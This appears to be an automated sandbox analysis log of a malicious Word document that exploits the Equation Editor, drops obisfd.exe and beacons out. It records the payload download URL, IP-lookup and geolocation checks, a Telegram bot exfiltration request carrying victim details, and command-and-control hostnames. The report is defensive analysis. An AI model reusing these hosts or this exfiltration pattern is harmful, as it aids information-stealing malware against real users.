00 0a 00 25 18 1f 0c 6f 1c 00 00 0a 00 25 19 1f 24 6f 1c 00 00 0a 00 25 1a 1f 48 6f 1c 00 00 0a 00 25 1b 1c 6f 1c 00 00 0a 00 25 1c 1f 24 6f 1c 00 00 0a 00 80 01 00 00 04 73 1d 00 00 0a 80 02 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1a 7e 05 00 00 04 2a 1b 30 03 00 6d 00 00 00 03
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2010/7/2024%20/%2011:37:00%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\obisfd.exeDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49169 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49164 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49168 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49166 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49176 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49174 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49180 -> 188.114.96.3:443
                Source: global trafficHTTP traffic detected: GET /txt/6FfzLi8FyhIIqWu.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 154.216.19.160Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.160
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4C41869C-0672-4277-9509-12EF10C75296}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2010/7/2024%20/%2011:37:00%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /txt/6FfzLi8FyhIIqWu.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 154.216.19.160Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 12:56:13 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000003.397395369.000000000067F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.397698167.000000000067F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.397637969.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.216.19.160/txt/6FfzLi8FyhIIqWu.exe
                Source: EQNEDT32.EXE, 00000002.00000003.397395369.000000000067F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.397698167.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.216.19.160/txt/6FfzLi8FyhIIqWu.exeC:
                Source: EQNEDT32.EXE, 00000002.00000002.397637969.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.216.19.160/txt/6FfzLi8FyhIIqWu.exej
                Source: EQNEDT32.EXE, 00000002.00000002.397637969.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.216.19.160/txt/6FfzLi8FyhIIqWu.exettC:
                Source: obisfd.exe, 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: obisfd.exe, 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: obisfd.exe, 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: obisfd.exe, 00000007.00000002.923787570.0000000002969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: obisfd.exe, 00000007.00000002.923787570.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000293B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000295B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002904000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000294D000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: obisfd.exe, 00000007.00000002.923787570.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002848000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000293B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000295B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002897000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000291F000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002904000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000294D000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: obisfd.exe, 00000007.00000002.923787570.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923618528.00000000007E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: obisfd.exe, 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: obisfd.exe, 00000007.00000002.924731101.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: obisfd.exe, 00000007.00000002.924731101.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: obisfd.exe, 00000007.00000002.923787570.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000286D000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000293B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000295B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002904000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000294D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: obisfd.exe, 00000005.00000002.405641399.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: obisfd.exe, 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: obisfd.exe, 00000007.00000002.924283093.000000000382B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003877000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: obisfd.exe, 00000007.00000002.923787570.0000000002969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: obisfd.exe, 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: obisfd.exe, 00000007.00000002.923787570.0000000002969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: obisfd.exe, 00000007.00000002.923787570.0000000002969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a
                Source: obisfd.exe, 00000007.00000002.924283093.000000000382B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003877000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: obisfd.exe, 00000007.00000002.924283093.000000000382B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003877000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
